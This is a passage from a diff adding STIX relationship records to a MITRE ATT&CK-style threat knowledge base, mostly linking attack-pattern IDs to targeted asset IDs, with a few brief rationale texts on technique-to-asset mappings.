"2024-06-21T14:12:20.260Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.260Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--9c306d8d-cde7-4b4c-b6e8-d0bb16caca36", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--0f5295ce-d705-4541-8dda-c569b126d103", + "created": "2023-10-02T20:24:03.723Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-10-02T20:24:03.723Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--2877063e-1851-48d2-bcc6-bc1d2733157e", + "target_ref": "x-mitre-asset--2b676abd-8263-49ea-81a4-78a7e1f776fe", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--0f5710a7-f015-40b8-ad3d-f281699f2b72", + "created": "2023-09-29T17:09:11.210Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T17:09:11.210Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3b6b9246-43f8-4c69-ad7a-2b11cfe0a0d9", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--0f5bb681-4e96-4e61-bafd-b71849b8e526", + "created": "2024-06-21T14:12:20.271Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.271Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--5d0d3609-d06d-49e1-b9c9-b544e0c618cb", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--0f73f5e2-8035-423e-9cbb-fd4d4cbdd9c7", + "created": "2024-07-02T13:55:55.771Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.771Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--a62a8db3-f23a-4d8f-afd6-9dbc77e7813b", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--0f74db4f-4030-4b77-aa6f-45dfbffb8601", + "created": "2024-07-02T13:55:55.758Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.758Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--0f7bcfaf-c218-4845-baa6-8a946949214b", + "created": "2024-07-02T13:55:55.761Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.761Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--bb5a00de-e086-4859-a231-fa793f6797e2", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--0faeb550-1ec6-4da9-a883-af0b0981bac2", + "created": "2024-07-02T13:55:55.757Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.757Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--f5bb433e-bdf6-4781-84bc-35e97e43be89", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--0fc6f428-cf40-483d-8ce6-181afb989027", + "created": "2024-07-02T13:55:55.757Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.757Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--da051493-ae9c-4b1b-9760-c009c46c9b56", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--0fcc9390-e73c-45bc-98fe-3621f341c3e0", + "created": "2024-07-02T13:55:55.756Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.756Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--bef8aaee-961d-4359-a308-4c2182bcedff", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--0fdcce61-061d-470f-8a1d-c3ac3d16a0ab", + "created": "2024-07-02T13:55:55.771Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.771Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d45a3d09-b3cf-48f4-9f0f-f521ee5cb05c", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--0fee6145-185d-417f-a431-201a5b3e3259", + "created": "2024-03-29T12:38:17.884Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2024-03-29T12:38:17.884Z", + "description": "", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--0d91b3c0-5e50-47c3-949a-2a796f04d144", + "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--0ffe7f91-0f76-4334-a332-acfc2006e725", + "created": "2024-06-21T14:12:20.258Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.258Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--544b0346-29ad-41e1-a808-501bb4193f47", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--100772c0-155f-4da2-a879-28f660c4e7cc", + "created": "2024-07-02T13:55:55.764Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.764Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--105fe63f-5744-419c-a83a-d5b58eb7b0ab", + "created": "2024-07-02T13:55:55.757Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.757Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ed7efd4d-ce28-4a19-a8e6-c58011eb2c7a", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--106530e1-375a-4ac4-befb-8297b3b05610", + "created": "2023-09-29T18:55:58.199Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2024-05-23T21:21:51.135Z", + "description": "Asset Mapping Rationale: Adversaries may communicate over a commonly used port to bypass firewalls or network detection systems and to blend in with normal network activity, to avoid more detailed inspection. They may use the protocol associated with the port, or a completely different protocol.", + "relationship_type": "targets", + "source_ref": "attack-pattern--e6c31185-8040-4267-83d3-b217b8a92f07", + "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", + "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--107592d4-e89a-4d1b-bf91-b636e78b8150", + "created": "2024-06-21T14:12:20.260Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.260Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--8d7bd4f5-3a89-4453-9c82-2c8894d5655e", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--1075956d-52a8-48c3-8e8f-be90fbbd947f", + "created": "2024-06-27T08:50:59.543Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-27T08:50:59.544Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1f9c2bae-b441-4f66-a8af-b65946ee72f2", + "target_ref": "x-mitre-asset--7818eb69-414c-43d2-9816-77e90a710edc", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--107e603b-1c79-4024-9d28-fef4b822ac9b", + "created": "2024-06-26T15:36:53.855Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T15:36:53.855Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--7de1f7ac-5d0c-4c9c-8873-627202205331", + "target_ref": "x-mitre-asset--8a455821-6e6e-49b0-9b6d-ac01011263c1", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--10812f11-fde3-4362-b455-89bbb2026b61", + "created": "2024-06-21T14:12:20.265Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.265Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--106c0cf6-bf73-4601-9aa8-0945c2715ec5", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--108d2abd-c797-4668-9037-ae43982c48ff", + "created": "2024-07-02T13:55:55.769Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.769Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--5909f20f-3c39-4795-be06-ef1ea40d350b", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--10ae3081-b342-4c38-bbed-9bfd0cedaefa", + "created": "2024-07-02T13:55:55.753Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.753Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--36b2a1d7-e09e-49bf-b45e-477076c2ec01", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--10c7986d-b46a-4d25-bf32-0b6029efa3c4", + "created": "2024-07-02T13:55:55.755Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.755Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--866d0d6d-02c6-42bd-aa2f-02907fdc0969", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--10e85e00-2da6-456e-91c5-903a084ec8b2", + "created": "2024-07-02T13:55:55.771Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.771Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b18eae87-b469-4e14-b454-b171b416bc18", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--10ee09db-e80d-4022-8810-7bba70b33609", + "created": "2020-10-19T19:03:52.121Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--3a40f208-a9c1-4efa-a598-4003c3681fb8", + "target_ref": "attack-pattern--1f9012ef-1e10-4e48-915e-e03563435fe8", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--10f95157-d4a4-4e33-9085-04344ebe97b5", + "created": "2024-06-21T14:12:20.273Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.273Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--a93494bb-4b80-4ea1-8695-3236a49916fd", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--10fdc4f4-9f50-40d8-94db-966fcc434a14", + "created": "2020-02-10T20:47:10.180Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--e51137a5-1cdc-499e-911a-abaedaa5ac86", + "target_ref": "attack-pattern--42e8de7b-37b2-4258-905a-6897815e58e0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--110411ad-4f42-43fc-aa80-52a6258f2223", + "created": "2024-07-02T13:55:55.756Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.756Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ac9e6b22-11bf-45d7-9181-c1cb08360931", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--11085cf6-f67f-46b4-b26a-6cac2b668657", + "created": "2024-06-21T14:12:20.255Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.255Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--0cf55441-b176-4332-89e7-2c4c7799d0ff", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--110d5cd8-0bd7-4148-b4af-99c45ed8e462", + "created": "2024-06-21T14:12:20.266Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.266Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--2bee5ffb-7a7a-4119-b1f2-158151b19ac0", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--1125875e-691d-40a8-91f8-14c6f6bd43b9", + "created": "2024-05-22T17:27:02.071Z", + "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-05-23T21:50:22.964Z", + "description": "Asset Mapping Rationale: Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.", + "relationship_type": "targets", + "source_ref": "attack-pattern--7e150503-88e7-4861-866b-ff1ac82c4475", + "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", + "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--1128bc97-37d7-472a-ba98-09bae3110307", + "created": "2024-06-26T15:02:48.896Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T15:02:48.896Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--c675646d-e204-4aa8-978d-e3d6d65885c4", + "target_ref": "x-mitre-asset--65c04f96-37e5-4358-ab16-087e240c1b6e", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--11297cdd-f693-42b2-bde6-c1aa73df279f", + "created": "2024-07-02T13:55:55.770Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.770Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--69e5226d-05dc-4f15-95d7-44f5ed78d06e", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--112a5f4d-c880-4488-a8c7-6f9d725308fc", + "created": "2024-07-02T13:55:55.751Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.751Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--f24faf46-3b26-4dbb-98f2-63460498e433", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--114ce875-dd82-4abb-a0f9-f5856ea2bd5c", + "created": "2024-07-02T13:55:55.749Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.749Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--457c7820-d331-465a-915e-42f85500ccc4", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--1159079f-0b76-4344-a8b5-5cbc3867d454", + "created": "2024-06-21T14:12:20.264Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.264Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--fb640c43-aa6b-431e-a961-a279010424ac", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--116191ae-f163-4d6e-9a79-d07a68d1388b", + "created": "2024-05-22T15:12:57.562Z", + "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-05-22T15:13:23.730Z", + "description": "Asset Mapping Rationale: Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are not limited to client machines, rather also include accounts that are preset for equipment such as network devices.", + "relationship_type": "targets", + "source_ref": "attack-pattern--6151cbea-819b-455a-9fa6-99a1cc58797d", + "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", + "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--117c60ff-4754-4a60-8566-3e52f81952b6", + "created": "2024-06-24T18:55:55.407Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-24T18:55:55.407Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--a62a8db3-f23a-4d8f-afd6-9dbc77e7813b", + "target_ref": "x-mitre-asset--2821ca87-8f61-47e5-a3bf-524f65573d77", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--11840b30-f0d1-4df5-a960-cdb80749c32a", + "created": "2023-09-29T17:07:25.209Z", + "created_by_ref": 